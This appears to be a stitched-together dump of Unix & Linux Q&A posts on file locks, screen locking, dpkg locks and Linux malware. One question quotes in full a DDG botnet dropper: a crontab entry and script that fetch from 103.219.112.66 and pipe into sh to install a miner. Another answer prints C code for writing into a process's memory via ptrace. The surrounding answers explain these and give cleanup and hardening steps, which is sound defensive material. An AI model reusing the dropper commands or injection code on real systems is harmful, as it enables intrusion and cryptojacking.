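ausearch -k dirwatch --start recent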
I'm quite new to Linux and I have not really a clue on how to do this. I've got a directory and I'd like to monitor (output to shell) when a file inside that directory get's a file lock and when it is released. It would be okay to know as well other things, like when a file is created and similar, but I'm mainly interested about the locks. I don't need to know which process does the lock, it's more about the order in which this happens. I'm pretty sure some tool for this exists (I already installed dtrace but after --help I decided to ask a question here). Any pointers warm-heartedly appreciated. I'm running a fedora 14 box if that matters.
How to trace file locks (per directory)
This simple script does the trick:
#!/bin/sh

case "$1" in
    hibernate|suspend)
        /usr/bin/vlock -ans &
        ;;
    thaw|resume)
        ;;
    *)
        exit $NA
        ;;
esac
In X I've used the following script (from here) to lock the computer with i3lock each time pm-suspend or pm-hibernate are invoked. /etc/pm/sleep.d/00screensaver-lock: #!/bin/sh # 00screensaver-lock: lock workstation on hibernate or suspend username=andreas userhome=/home/$username export XAUTHORITY="$userhome/.Xauthority" export DISPLAY=":0" case "$1" in hibernate|suspend) su $username -c "/usr/bin/i3lock & ;; thaw|resume) ;; *) exit $NA ;; esacNow I'm in the process of setting up a console-only laptop (a minimal Debian install without the X server installed.) I've tried using the above script on that machine to lock my session using vlock. (That is: I've switched out i3lock with vlock in the version of the script I'm using on the console machine.) I've also tried commenting out the two lines starting with export XAUTHORITY and export DISPLAY=":0" as they are X specific. The script doesn't work on the no-X machine. How should I call vlock each time the computer suspends/hibernates?
Locking console when computer suspends/hibernates
fcntl(57, F_SETLK, …) means that the process is trying to take a lock on the file which is open on file descriptor 57. The error EAGAIN means that taking the lock failed because it is already held by another process. The lock is specifically on the portion of the file from offset 1073741824 to offset 1073741825. On Linux, you can use lslocks to see what locks are being held. To find who has the lock that Apache is waiting for, you'll need to know what file it's on; lsof -p $pid will tell you what file is open on fd 57. Assuming that the process needs the lock to continue, it will not be responsive until whichever other process holds the lock releases it. The problem is not that a resource is unavailable and needs to be created, but that an existing resource is currently busy.
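A sketch of that lookup, where the PID and file name are placeholders you fill in:
ls -l /proc/<apache-pid>/fd/57            # the symlink target is the file open on fd 57
lsof -p <apache-pid> | awk '$4 ~ /^57/'   # same information via lsof
lslocks | grep <that-file>                # shows which PID currently holds a lock on it
As an aside, the offset 1073741824 (1 GiB) happens to be where SQLite places its locking bytes, so an SQLite database file is a plausible suspect once you see the file name.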
When I use strace on Apache while it acts unresponsive, I get the following output:
[pid 13704] fcntl(57, F_SETLK, {type=F_RDLCK, whence=SEEK_SET, start=1073741824, len=1}) = -1 EAGAIN (Resource temporarily unavailable)
What does it mean, and what kind of lock would the process need to be responsive again?
Meaning of fcntl ... F_SETLK ... (Resource temporarily unavailable) in strace output?
I had the same problem some years ago, caused by a GUI widget that was checking for system updates and locking the package manager. Check your running GUI applications (including widgets and systray applets) to make sure none related to package management is open.
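One way to see directly which process is holding the lock, so you know what to close or wait for; both commands are standard, and the lock path is the one from your error message:
sudo fuser -v /var/lib/dpkg/lock
sudo lsof /var/lib/dpkg/lock
If nothing is listed but the file is still there, it is simply a stale leftover rather than an active lock.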
I'm not able to install, update or do anything else with apt-get, aptitude, dpkg and so on. The lock-file /var/lib/dpkg/lock exists from boot-time on. When I delete it and run apt-get update, it prints out, that dpkg has been interrupted. I tried dpkg --configure -a as mentioned in the help text, but that runs into a problem with gconf2: root@andre-ubuntu:/home/andre# dpkg --configure -a Setting up libbonoboui2-0:amd64 (2.24.5-0ubuntu2) ... Setting up libgnomeui-0:amd64 (2.24.5-2ubuntu3) ... Processing triggers for libc-bin ... ldconfig deferred processing now taking place Setting up gconf2 (3.2.6-0ubuntu1) ...(gconftool-2:16760): GConf-WARNING **: Client failed to connect to the D-BUS daemon: Did not receive a reply. Possible causes include: the remote application did not send a reply, the message bus security policy blocked the reply, the reply timeout expired, or the network connection was broken.dpkg stops at this point and i can't even interrupt it with Ctrl+C. I have the following version of Ubuntu: Linux andre-ubuntu 3.8.0-19-generic #30-Ubuntu SMP Wed May 1 16:35:23 UTC 2013 x86_64 x86_64 x86_64 GNU/LinuxDo you have any ideas what to do?
Can't install anything
Your script seems good enough. There are just some improvements needed:
#!/bin/bash
shopt -s nullglob
for fd in "/proc/$$/fd/"*; do
    fd=${fd##*/}
    case "$fd" in
        0|1|2|255) ;;
        *) eval "exec $fd>&-" ;;
    esac
done
exec "$@"
nullglob prevents the pattern from expanding to itself if no file is found. Globbing (filename expansion) together with the ${v##pat} parameter substitution is enough; using ls is not needed. You can just use "$@" to represent all arguments passed to the script. The script is guaranteed to run without any external dependency, so it's as good as running a binary.
I have a script using the flock executable. It works well. The problem is when this script calls another script, which creates a background process. In this situation the background process inherits the locked file handle; this is normal system behavior. I'm looking for any tool that works as a wrapper and closes all unneeded handles, especially those with file locks. In my case only the main process should be protected against running twice. I know this is an untypical situation; usually all children should finish before the file lock is released, but here that does not work. For now I use a workaround, a wrapper with the code below, but I'd prefer to use some binary wrapper. Code:
#!/bin/bash
for fd in $(ls /proc/$$/fd); do
    case "$fd" in
        0|1|2|255) ;;
        *) eval "exec $fd>&-" ;;
    esac
done
exec $1 $2 $3 $4 $5 $6 $7 $8 $9
Remove unneeded file lock in script
The cron job is treating /var/cache/etckeeper/packagelist.pre-install as evidence that an installation is being processed, so it shouldn’t archive anything just yet. That file isn’t supposed to be a lock file, but the cron job is using it as a substitute. However I wouldn’t particularly worry about etckeeper and any lock files it has or hasn’t. If you want a consistent backup of an etckeeper managed tree, use the VCS’s features (but don’t forget any ignored files). The dpkg locks are documented (albeit briefly) as public interfaces in frontend.txt (/usr/share/doc/dpkg-dev/frontend.txt in dpkg-dev).
Context: I want to put a lock on etckeeper/apt hook activity during a special backup. The objective is to preserve whole-package integrity, e.g., wait until any package installation is complete, and then prevent a new installation from starting until the special backup is complete. I found a shell script under cron which appears to be attempting to take a lock on /var/cache/etckeeper/packagelist.pre-install, but it is not done atomically and so it is flawed. I presume the cron shell script is part of the Ubuntu 16.04 installation, not part of the etckeeper release. The flawed lock code is shown below. I searched for etckeeper documentation about the use of /var/cache/etckeeper/packagelist.pre-install as a lock file and found no documentation. But I did find a piece of a script file which writes to /var/cache/etckeeper/packagelist.pre-install without treating it as a lock file. At this time I am presuming that /var/cache/etckeeper/packagelist.pre-install is not intended to serve as a lock file interface for etckeeper. The etckeeper internal script not treating /var/cache/etckeeper/packagelist.pre-install as a lock file is shown below.
Question 1: Is there (and if so, where is) documentation on the etckeeper locking mechanism, or a developer portal where I can issue a request for clarification?
There are plenty of questions and much discussion on stackexchange sites about the use of /var/lib/apt/lists/lock (we call it the apt lock below) and /var/lib/dpkg/lock (we call it the dpkg lock below) as locks for apt and dpkg respectively. All of those discussions are concerned with stuck locks, how to diagnose them, and how to unstick them. However, I can find no references to official apt and dpkg documentation specifying the use of those lock files as a formal interface.
Question 2: Is there (and if so, where is) documentation on the apt lock mechanism and/or dpkg lock mechanism as public interfaces?
Flawed lock attempt shell script, probably provided by Ubuntu 16.04:
$ sudo cat /etc/cron.daily/etckeeper
#!/bin/sh
set -e
if [ -x /usr/bin/etckeeper ] && [ -e /etc/etckeeper/etckeeper.conf ]; then
    . /etc/etckeeper/etckeeper.conf
    if [ "$AVOID_DAILY_AUTOCOMMITS" != "1" ]; then
        # avoid autocommit if an install run is in progress
        lockfile=/var/cache/etckeeper/packagelist.pre-install
        if [ -e "$lockfile" ] && [ -n "$(find "$lockfile" -mtime +1)" ]; then
            rm -f "$lockfile" # stale
        fi
        if [ ! -e "$lockfile" ]; then
            AVOID_SPECIAL_FILE_WARNING=1
            export AVOID_SPECIAL_FILE_WARNING
            if etckeeper unclean; then
                etckeeper commit "daily autocommit" >/dev/null
            fi
        fi
    fi
fi
Etckeeper internal shell script writing to packagelist.pre-install and not treating it as a lock, hence I don't think it was intended as a lock interface:
$ sudo cat /etc/etckeeper/pre-install.d/10packagelist
#!/bin/sh
# This list will be later used when committing.
mkdir -p /var/cache/etckeeper/
etckeeper list-installed > /var/cache/etckeeper/packagelist.pre-install
etckeeper list-installed fmt > /var/cache/etckeeper/packagelist.fmt
Where is official documentation about locking mechanisms for etckeeper, apt, and/or dpkg?
In short: file locking is normally only supported by higher-level languages (as far as I know). For Perl examples you can start here https://stackoverflow.com/questions/34920/how-do-i-lock-a-file-in-perl or with any of the Perl classics like https://docstore.mik.ua/orelly/perl/cookbook/ch07_12.htm (beware SSL cert issues). For shell scripting you have to consider JdeBP's comment: why do you want to lock your file? Depending on your answer, you could consider strategies like temporarily changing write permissions on the file, renaming the file and processing the renamed file before changing the name back (sketched below), or working on a copy and rewriting the original afterwards.
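A rough sketch of the rename-and-process strategy in shell, where the path and run_tests are placeholders standing in for your file and whatever your tests actually are:
f=/var/www/upload/data.csv
mv "$f" "$f.busy"        # take the file out of the area the FTP/Apache side sees
run_tests "$f.busy"      # hypothetical command representing your tests
mv "$f.busy" "$f"        # put it back when done
Note that this only coordinates with programs that look the file up by name; a process that already has the file open keeps using it regardless, which is exactly the "running program" situation in your error message.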
I would like to lock a file, run some tests then unlock the file. How can I do this. I could use the command line, perl, or a shell script. The reason I would like to lock the file is occasionally when connecting with ftp to our Apache server we get an error upon deleting files: "Cannot open or remove a file containing a running program". I would like to test using an ftp move command instead of a delete command to see if I catch this error. I would like to test whether locking a file would cause this error.
How can I simulate locking a file?
You can simply use the package from sid (https://packages.debian.org/sid/vlock), it works fine.
I've set up a no-x/console only system running a minimal install of debian jessie/testing. For this system I need a screen locker to lock the entire session when I'm away. vlock would be appropriate but for some reason it's not in the jessie repo. Does anyone know why vlock isn't in the jessie repo? What can I use instead? FYI I'm using tmux.
Lock console session
This LINK to the lists.samba archive has a user with the same file locking issue. Essentially, find the PID of the process and kill it; this should free the lock (sometimes). I have used this in the past and it has worked for me any time I had a locked file, but I am not using Outlook. The next response in the thread suggests a [global] option setting for Samba: you might try setting reset on zero vc = yes in your [global] section. EDIT: This is pretty good reading on Samba locking: Chapter 17. File and Record Locking
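Since the server side is Samba, a quicker way to find the right PID is usually smbstatus; a sketch (the file name is just an example):
smbstatus -L | grep -i outlook.pst    # list locked files with the PID of the smbd process holding them
kill <pid>                            # ends that smbd session; the user is disconnected from the share
This avoids the copy entirely, at the cost of kicking the user's (already crashed) session off the server.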
My organisation uses Debian Linux running Samba for office file servers. Users run Outlook for their email, which crashes fairly regularly and leaves the outlook.pst file locked. Currently, our procedure for removing the lock (which allows the user to use Outlook again) is:
Manually open a terminal session
Go to the user's dir holding the outlook.pst file
Remove the ~outlook.pst.tmp file (or similar name)
Rename the pst file (eg mv outlook.pst outlook.pstoff)
Copy the file back to outlook.pst (ie cp outlook.pstoff outlook.pst)
Remove the old file (ie rm outlook.pstoff)
chown outlook.pst to the user
This could be scripted reasonably easily, but to be done properly it would need to check for available disk space before doing the copy. Is there some easier way to remove the lock on the file without copying it?
Is there a better way to unlock a file than move and copy?
You don't say which Desktop Environment you're using. There could be multiple places for these lock settings. Look for screensaver settings, there may be a lock screen/session option. It's not uncommon to have multiple screensaver applications installed so you may have to look at all of them to figure out which is active. Also look in the Power Manager settings. This is another place that there could be a lock setting under Display, Session, or Screen.
I run Linux Mint in a VM. Every single time I look at it, it has gone into some sort of "lock screen"-like state where it requires me to enter a password to get back. This is very annoying. How do I turn this off entirely so that it never "auto-locks"? I already looked through a bunch of a settings but found nothing. Also, I already tried this and it does NOT work! https://vitux.com/how-to-disable-enable-automatic-screen-lock-in-linux-mint-20-trough-cli/
How do I make Linux Mint stop pestering me for passwords all the time?
Probably this is not the perfect answer, but it is a workaround. I wanted this to run:
exec_always xautolock -time 1 -locker "i3lock && xset dpms force off"
But it didn't. After reading the xautolock manual a little, I tried this:
exec_always xautolock -time 1 -locker "i3lock" -killtime 1 -killer "xset dpms force off"
That didn't run either... So finally I tried this:
exec_always xautolock -time 1 -locker "xset dpms force off" -notify 5 -notifier "i3lock -n -c 0E1621"
That seems to be working. See also "using xautolock and i3lock to lock/suspend after inactivity". Hope that this may help you!
After recently switching to i3 in Arch, I need something to manage power. xautolock seemed to be a good choice. Unfortunately, I need it to do both systemctl suspend and i3lock at the same time, but it cannot achieve that. Eg. exec_always xautolock -time 3 -locker "i3lock && systemctl suspend"That does not work at all, after i3lock is triggered, suspend won't happen. Interesting though, the fact that this: bindsym $mod+Control+s exec --no-startup-id i3lock && systemctl suspendActually works, after pressing the binding, i3locks screen and system is suspended. Please let me know if xautolock can achieve the same thing, and what options will I need to add in order for it to work. Thank you for taking the time for a look! And just as a side note, exec_always xautolock -time 3 -locker “systemctl suspend” Works, but it only suspends machine and not lock it.
xautolock configuration in Arch i3
You can acquire a partial lock using the fcntl(2) system call with the F_SETLK, F_SETLKW, or F_GETLK command macros, providing the byte range to be locked through a struct flock passed as the third argument.
F_SETLK, F_SETLKW, and F_GETLK are used to acquire, release, and test for the existence of record locks (also known as byte-range, file-segment, or file-region locks). The third argument, lock, is a pointer to a structure that has at least the following fields (in unspecified order).
struct flock {
    ...
    short l_type;    /* Type of lock: F_RDLCK, F_WRLCK, F_UNLCK */
    short l_whence;  /* How to interpret l_start: SEEK_SET, SEEK_CUR, SEEK_END */
    off_t l_start;   /* Starting offset for lock */
    off_t l_len;     /* Number of bytes to lock */
    pid_t l_pid;     /* PID of process blocking our lock (set by F_GETLK and F_OFD_GETLK) */
    ...
};
The l_whence, l_start, and l_len fields of this structure specify the range of bytes we wish to lock. Bytes past the end of the file may be locked, but not bytes before the start of the file.
Linux and AFAIK most unixes expose the flock syscall for mandatory file-locking. My experience is admittedly limited with this, however am informed that it is kernel-enforced on the entire resource. But what if I wanted to only lock a part of a file mandatorily, such that read/writes to this resource are permitted, as long as they don't cross a particular boundary or stop reading once it reaches an outer bound of the locked region. Is this possible? Edit: Possible Implementation A possibility for advisory partial locking may be via MMaped regions, where the memory is mapped into each reader's address-space, on the condition that the requested region does not hold a lock. This would be implemented entirely in user-space, and thus loses the advantages of kernel-enforced locking, but would certainly work
Unix-esque partial-file-locking mechanism
This could be related to an issue with Xfce Power Manager. A sufficient workaround is to suspend via the logout menu in LXDE. The computer then wakes with no issues.
I have had Slackware 14.2 32bit installed on a netbook with LXDE as my main DE for about a month now. My main issue is that sometimes the screen is black on waking from sleep [suspend] and the only way to get back to the desktop is to REISUB or sometimes to do a hard reset. I thought the issue was with LXsession since I am running LXDE, so I updated LXsession to the latest version 0.5.3. However, this has had little effect on improvements. I have done experiments with Xfce, Fluxbox and Blackbox by enabling physlock and then waking, and I still have the same problem: the screen is black on unlock and the only way to get to the desktop is by rebooting. I have tried using the generic kernel instead of huge and it's the same issue. I don't think it's a hardware issue since the netbook was using Debian before and it didn't happen, so it must be something to do with whatever process controls waking from sleep/lock - but I don't know what that is. It could be a graphics issue [it uses Intel 945GME], but I don't think so, I think it's to do with the sleep process. Any help would be great since I am running out of ideas!
Slackware 14.2 - black screen after waking from sleep/lock - what process controls sleep/lock?
First, it's certainly possible to have viruses under Unix and Unix-like operating systems such as Linux. The inventor of the term computer virus, Fred Cohen, did his first experiments under 4.3BSD. A How-To document exists for writing Linux viruses, although it looks like it hasn't had an update since 2003. Second, source code for sh-script computer viruses has floated around for better than 20 years. See Tom Duff's 1988 paper, and Doug McIllroy's 1988 paper. More recently, a platform-independent LaTeX virus got developed for a conference. Runs on Windows and Linux and *BSD. Naturally, its effects are worse under Windows... Third, a handful of real, live computer viruses for (at least) Linux have appeared, although it's not clear if more than 2 or 3 of these (RST.a and RST.b) ever got found "in the wild". So, the real question is not Can Linux/Unix/BSD contract computer viruses? but rather, Given how large the Linux desktop and server population is, why doesn't that population have the kind of amazing plague of viruses that Windows attracts? I suspect that the reason has something to do with the mild protection given by traditional Unix user/group/other discretionary protections, and the fractured software base that Linux supports. I mean, my server still runs Slackware 12.1, but with a custom-compiled kernel and lots of re-compiled packages. My desktop runs Arch, which is a rolling release. Even though they both run "Linux", they don't have much in common. The state of viruses on linux may actually be the normal equilibrium. The situation on Windows might be the "dragon king", really unusual situation. The Windows API is insanely baroque, Win32, NT-native API, magic device names like LPT, CON, AUX that can work from any directory, the ACLs that nobody understands, the tradition of single-user, nay, single root user, machines, marking files executable by using part of the file name (.exe), all of this probably contributes to the state of malware on Windows.
Is it possible for my Linux box to become infected with a malware? I haven't heard of it happening to anyone I know, and I've heard quite a few times that it isn't possible. Is that true? If so, what's up with Linux Anti-Virus (security) software?
The myths about malware in Unix / Linux
It is a DDG mining botnet. This is how it works:
it exploits an RCE vulnerability
it modifies the crontab
it downloads the appropriate mining program (written in Go)
it starts the mining process
See:
DDG: A Mining Botnet Aiming at Database Servers
SystemdMiner, when a botnet borrows another botnet's infrastructure
U&L: How can I kill minerd malware on an AWS EC2 instance? (compromised server)
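If you decide to clean up in place rather than re-flash the SD card (re-flashing is the safer option), the persistence points are the ones visible in the script you posted; a sketch of checking and removing them:
crontab -l -u root                   # confirm the entry is still there
crontab -r -u root                   # remove root's crontab (re-add any legitimate entries afterwards)
cat /var/spool/cron/crontabs/root    # the script also writes this file directly
pkill -9 -f xribfa                   # stop the running miner, if any
rm -f /usr/bin/xribfa4 /usr/libexec/xribfa4 /usr/local/bin/xribfa4 /tmp/xribfa4
Also change any passwords or keys reachable from the Pi and find out how the attacker got in (weak SSH password, exposed service, etc.), or it will simply come back.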
I wanted to add something to my root crontab file on my Raspberry Pi, and found an entry that seems suspicious to me, searching for parts of it on Google turned up nothing. Crontab entry: */15 * * * * (/usr/bin/xribfa4||/usr/libexec/xribfa4||/usr/local/bin/xribfa4||/tmp/xribfa4||curl -m180 -fsSL http://103.219.112.66:8000/i.sh||wget -q -T180 -O- http://103.219.112.66:8000/i.sh) | shThe contents of http://103.219.112.66:8000/i.sh are: export PATH=$PATH:/bin:/usr/bin:/usr/local/bin:/usr/sbinmkdir -p /var/spool/cron/crontabs echo "" > /var/spool/cron/root echo "*/15 * * * * (/usr/bin/xribfa4||/usr/libexec/xribfa4||/usr/local/bin/xribfa4||/tmp/xribfa4||curl -fsSL -m180 http://103.219.112.66:8000/i.sh||wget -q -T180 -O- http://103.219.112.66:8000/i.sh) | sh" >> /var/spool/cron/root cp -f /var/spool/cron/root /var/spool/cron/crontabs/rootcd /tmp touch /usr/local/bin/writeable && cd /usr/local/bin/ touch /usr/libexec/writeable && cd /usr/libexec/ touch /usr/bin/writeable && cd /usr/bin/ rm -rf /usr/local/bin/writeable /usr/libexec/writeable /usr/bin/writeableexport PATH=$PATH:$(pwd) ps auxf | grep -v grep | grep xribfa4 || rm -rf xribfa4 if [ ! -f "xribfa4" ]; then curl -fsSL -m1800 http://103.219.112.66:8000/static/4004/ddgs.$(uname -m) -o xribfa4||wget -q -T1800 http://103.219.112.66:8000/static/4004/ddgs.$(uname -m) -O xribfa4 fi chmod +x xribfa4 /usr/bin/xribfa4||/usr/libexec/xribfa4||/usr/local/bin/xribfa4||/tmp/xribfa4ps auxf | grep -v grep | grep xribbcb | awk '{print $2}' | xargs kill -9 ps auxf | grep -v grep | grep xribbcc | awk '{print $2}' | xargs kill -9 ps auxf | grep -v grep | grep xribbcd | awk '{print $2}' | xargs kill -9 ps auxf | grep -v grep | grep xribbce | awk '{print $2}' | xargs kill -9 ps auxf | grep -v grep | grep xribfa0 | awk '{print $2}' | xargs kill -9 ps auxf | grep -v grep | grep xribfa1 | awk '{print $2}' | xargs kill -9 ps auxf | grep -v grep | grep xribfa2 | awk '{print $2}' | xargs kill -9 ps auxf | grep -v grep | grep xribfa3 | awk '{print $2}' | xargs kill -9echo "*/15 * * * * (/usr/bin/xribfa4||/usr/libexec/xribfa4||/usr/local/bin/xribfa4||/tmp/xribfa4||curl -m180 -fsSL http://103.219.112.66:8000/i.sh||wget -q -T180 -O- http://103.219.112.66:8000/i.sh) | sh" | crontab -My Linux knowledge is limited, but to me it seems that downloading binaries from an Indonesian server and running them as root regularly is not something that is usual. What is this? What should I do?
Suspicious crontab entry running 'xribfa4' every 15 minutes
Most normal users can send mail, execute system utilities, and create network sockets listening on higher ports. This means an attacker could:
send spam or phishing mails,
exploit any system misconfiguration only visible from within the system (think private key files with permissive read permissions),
set up a service to distribute arbitrary content (e.g. a porn torrent).
What exactly this means depends on your setup. E.g. the attacker could send mail looking like it came from your company and abuse your server's mail reputation, even more so if mail authentication features like DKIM have been set up. This works until your server's reputation is tainted and other mail servers start to blacklist the IP/domain. Either way, restoring from backup is the right choice.
After a recent break in on a machine running Linux, I found an executable file in the home folder of a user with a weak password. I have cleaned up what appears to be all the damage, but am preparing a full wipe to be sure. What can malware run by a NON-sudo or unprivileged user do? Is it just looking for files marked with world writable permission to infect? What threatening things can a non-admin user do on most Linux systems? Can you provide some examples of real world problems this kind of security breach can cause?
Can malware run by a user without admin or sudo privileges harm my system? [closed]
Those are TCP connections that were used to make an outgoing connection to a website. You can tell from the trailing :80, which is the port typically used for HTTP connections to web servers. After such a connection has been closed, the socket lingers for a while in a "wait to close" (TIME_WAIT) state, no longer attached to any process. This bit is your local system's IP address and the port that was used to make the connection to the remote web server:
IP: 192.168.0.100 PORT: 50161
Example
Here's output from my system using netstat -ant:
tcp 0 0 192.168.1.20:54125 198.252.206.25:80 TIME_WAIT
Notice the state at the end? It's TIME_WAIT. You can further convince yourself of this by adding the -p switch so we can see what process is bound/associated with this particular connection:
$ sudo netstat -antp | grep 192.168.1.20:54125
$
This shows that no process was affiliated with this connection.
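On systems where netstat has been replaced by the iproute2 tools, ss gives the same view; the filter below narrows the listing to sockets whose remote port is 80 (the filter syntax may vary slightly between ss versions):
ss -tan state time-wait '( dport = :80 )'
Since TIME_WAIT sockets are held by the kernel rather than by any process, it is expected that no PID shows up for them, which is why nethogs prints "?".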
This is what I see in Nethogs:I'm concerned about the listings with PID ?, running as root. How can I find out what these are? I'm running Linux Mint 14. Please let me know what other information I should include.
How to tell if mysterious programs in nethogs listing are malware?
Yes and no. Viruses/trojans are just programs, and will work on Wine... Also, your normal Linux file system is exposed to Wine with the credentials of the user that launches Wine. BUT, viruses are usually based on lots of hacks, and they expect a "standard" and common Windows installation. I doubt that any virus is coded with the expectation of being executed on Wine, and if one exists, it will probably not be very successful. Why? Because Wine users are a small portion of normal users, they have "weird" and unusual installations (think of all the flavours of Linux+Wine), they are usually advanced users, and they have a strong community that is aware of security. So: yes, you are exposed to Windows viruses, but not fully exposed, and most probably your Linux installation will not be contaminated. Just be as careful as you would be on Windows. On the other hand, you can use several techniques to increase security: use chrooted Wine (search Google for chroot), virtualized environments, etc...
Just wondering if installing Wine might open up a fairly solid Linux desktop to the world of Windows viruses. Any confirmed reports about that? Would you then install a Windows antivirus product under Wine?
Does installing and using Wine open up your Linux platform to Windows viruses?
Look here: https://www.maketecheasier.com/more-gnome-shell-tips-and-tricks/ Scroll down to 6 "Screencast Recording". It says: Unknown to many, Gnome Shell has a built-in screen recorder. At any point of time, you just have to press the shortcut key “Shift + Ctrl + Alt + R” to activate the screen recorder. Once activated, you will see a recording button at the bottom right corner. Press “Shift + Ctrl + Alt + R” again to stop the recording. It will then save itself with the filename “shell-date-string-counter.webm” in your Home folder.
Some days ago this widget appeared on screen and I have no idea how to remove it or how it came to my system. It is not captured in screenshots. I suspect it is malware. Any ideas?
Which process places a red circle to the bottom right corner of my display on Linux Mint 18.1?
Fileless malware attacks the target by exploiting a vulnerability, e.g. in a browser's Flash plugin or in a network protocol. A Linux process can be modified by using the system call ptrace(). This system call is usually used by debuggers to inspect and manage the internal state of the target process, and is useful in software development. For instance, let's consider a process with PID 1234. This process' whole address space can be viewed in the pseudo filesystem /proc at the location /proc/1234/mem. You can open this pseudofile, then attach to the process via ptrace(); after doing so, you can use pread() and pwrite() to read from and write to the process' address space.
char file[64];
pid_t pid = 1234;
long value;    /* buffer for the word being read or written */

sprintf(file, "/proc/%ld/mem", (long)pid);
int fd = open(file, O_RDWR);
ptrace(PTRACE_ATTACH, pid, 0, 0);
waitpid(pid, NULL, 0);
off_t addr = ...; // target process address
pread(fd, &value, sizeof(value), addr);
// or
pwrite(fd, &value, sizeof(value), addr);
ptrace(PTRACE_DETACH, pid, 0, 0);
close(fd);
(Code taken from here. Another paper about a ptrace exploit is available here.)
Concerning kernel-oriented defense against these attacks, the only way is to install kernel vendor patches and/or disable the particular attack vector. For instance, in the case of ptrace you can load a ptrace-blocking module into the kernel which will disable that particular system call; clearly this also makes you unable to use ptrace for debugging.
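One widely available hardening knob for the ptrace vector specifically is the Yama LSM's ptrace_scope sysctl, present in most mainstream distribution kernels (values 0 to 3; 3 disables ptrace attach entirely until reboot). A sketch; the sysctl.d file name is just a conventional choice:
cat /proc/sys/kernel/yama/ptrace_scope                    # current setting
sudo sysctl -w kernel.yama.ptrace_scope=1                 # only allow tracing of direct children
echo 'kernel.yama.ptrace_scope = 1' | sudo tee /etc/sysctl.d/10-ptrace.conf    # persist across reboots
This limits what an already-running unprivileged process can attach to, without removing ptrace for ordinary parent/child debugging.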
I understand the definition of fileless malware:Malicious code that is not file based but exists in memory only… More particularly, fileless malicious code … appends itself to an active process in memory…Can somebody please explain how this appending itself to an active process in memory works ? Also, what (kernel) protection/hardening is available against such attacks ?
how does fileless malware work on linux?
I straced ls and got more information to dig into (non-important syscalls stripped):
open("empty_dir", O_RDONLY|O_NONBLOCK|O_DIRECTORY|O_CLOEXEC) = 3
getdents(3, /* 3 entries */, 32768) = 80
write(1, ".\n", 2.) = 2
write(1, "..\n", 3..) = 3
Hmm, we see that the getdents syscall works correctly and returned all 3 entries ('.', '..' and '_---*'), but ls wrote only '.' and '..'. It means that we have some problem with the wrapper around getdents which is used by coreutils. And coreutils uses the readdir glibc wrapper for getdents. Also, to prove that there are no problems with getdents, I tested the little program from the example section of the getdents man page. That program showed all files. Maybe we just found a bug in glibc? So I updated the glibc package to the latest version in my distro but didn't get any good result. Also I didn't find any correlating information in bugzilla. So let's go deeper:
# gdb ls
(gdb) break readdir
(gdb) run
Breakpoint 1, 0x00007ffff7dfa820 in readdir () from /lib64/libncom.so.4.0.1
(gdb) info symbol readdir
readdir in section .text of /lib64/libncom.so.4.0.1
Wait, what? libncom.so.4.0.1? Not libc? Yes, we are looking at a malicious shared library with libc functions for hiding malicious activity:
# LD_PRELOAD=/lib64/libc.so.6 find / > good_find
# find / > injected_find
# diff good_find injected_find
10310d10305
< /lib64/libncom.so.4.0.1
73306d73300
< /usr/bin/_-config
73508d73501
< /usr/bin/_-pud
73714d73706
< /usr/bin/_-minerd
86854d86845
< /etc/ld.so.preload
Removing the rootkit files, checking all packages' files (rpm -Va in my case), auto-start scripts, preload/prelink configs and system files (find / + rpm -qf in my case), changing affected passwords, finding and killing the rootkit's processes:
# for i in /proc/[1-9]*; do name=$(</proc/${i##*/}/comm); ps -p ${i##*/} > /dev/null || echo $name; done
_-minerd
In the end, a full system update, a reboot, and the problem was solved. The reason for the successful hacking: an IPMI interface with very old firmware which had suddenly become available from the public network.
I have a problem with removing empty dir, strace shows error: rmdir("empty_dir") = -1 ENOTEMPTY (Directory not empty)And ls -la empty_dir shows nothing. So i connected to the fs (ext4) with debugfs and see the hidden file inside this dir: # ls -lia empty_dir/ total 8 44574010 drwxr-xr-x 2 2686 2681 4096 Jan 13 17:59 . 44573990 drwxr-xr-x 3 2686 2681 4096 Jan 13 18:36 ..debugfs: ls empty_dir 44574010 (12) . 44573990 (316) .. 26808797 (3768) _-----------------------------------------------------------.jpg Why could this happen? And any chance to solve this problem without unmounting and full checking fs? Additional information: The "hidden" file is just a normal jpg file and can be opened by the image viewer: debugfs: dump empty_dir/_-----------------------------------------------------------.jpg /root/hidden_file# file /root/hidden_file /root/hidden_file: JPEG image data, JFIF standard 1.02rm -rf empty_dir is not working with the same error: unlinkat(AT_FDCWD, "empty_dir", AT_REMOVEDIR) = -1 ENOTEMPTY (Directory not empty)find empty_dir/ -inum 26808797 shows nothing.
rmdir failed to remove empty directory
At the end of day, after investigating the issue, the VMs doing mixed case DNS requests are OpenBSD machines running rebound, a DNS proxy used in OpenBSD. Moreover, it appears it is nowadays common practice rebound, Unbound, pydig and Tor making such mixed case queries as a security measure. Thus, the queries are not the result of malware in this case. From Use of Mixed Case DNS QueriesThese queries appear to be the result of DNS servers supporting a relatively new DNS security mechanism, "0x20 Bit encoding". The approach got its name from encoding a bit value using the case of letters. if bit 0x20 is set in a byte, the letter is lower case. If it is cleared, the letter is upper case. Host names are not case sensitive. However, the case is maintained. The answer will use the same mixed case as the query. As it turns out, almost all DNS servers follow this behaviour. The new part is that now some DNS servers start to deliberately encode a random value into each query they send, and then verify if the value is maintained in the response. This in effect adds additional bits to the query id. While this is clearly a "hack", it is a pretty attractive one. If your DNS server supports this feature, it will automatically gain a few more bits of "spoofing resistance". The DNS servers it connects to do not need to change anything. Unlike for DNSSEC, which is of course the real fix, but requires extensive work to configure,and has to be configured for each zone.From calomel - Unbound DNS TutorialWhat is dns-0x20 capitalization randomization ? Capitalization randomization is also called dns-0x20. This is an experimental resilience method which uses upper and lower case letters in the question hostname to obtain randomness. On average adding about 7 or 8 bits of entropy. This method currently has to be turned on by the dns admin manually, as it may result in maybe 0.4% of domains getting no answers due to no support on the authoritative server side. In our second example we enable the directive "use-caps-for-id: yes" for better security using dns-0x20. All this means is that calomel.org is the same as CaLOMeL.Org which is the same as CALOMEL.ORG. When Unbound sends a query to a remote server it sends the hostname string in random upper and lower characters. The remote server must resolve the hostname as if all the characters were lower case. The remote server must then send the query back to Unbound in the same random upper and lower characters that Unbound sent. If the characters of the hostname in the response are in the same format as the query then the dns-0x20 check is satisfied. Attackers hoping to poison a Unbound DNS cache must therefore guess the mixed-case encoding of the query and the timing of the return dns answer in addition to all other fields required in a DNS poisoning attack. dns-0x20 increases the difficulty of the attack significantly.Related question: Chrome: DNS requests with random DNS names: malware?
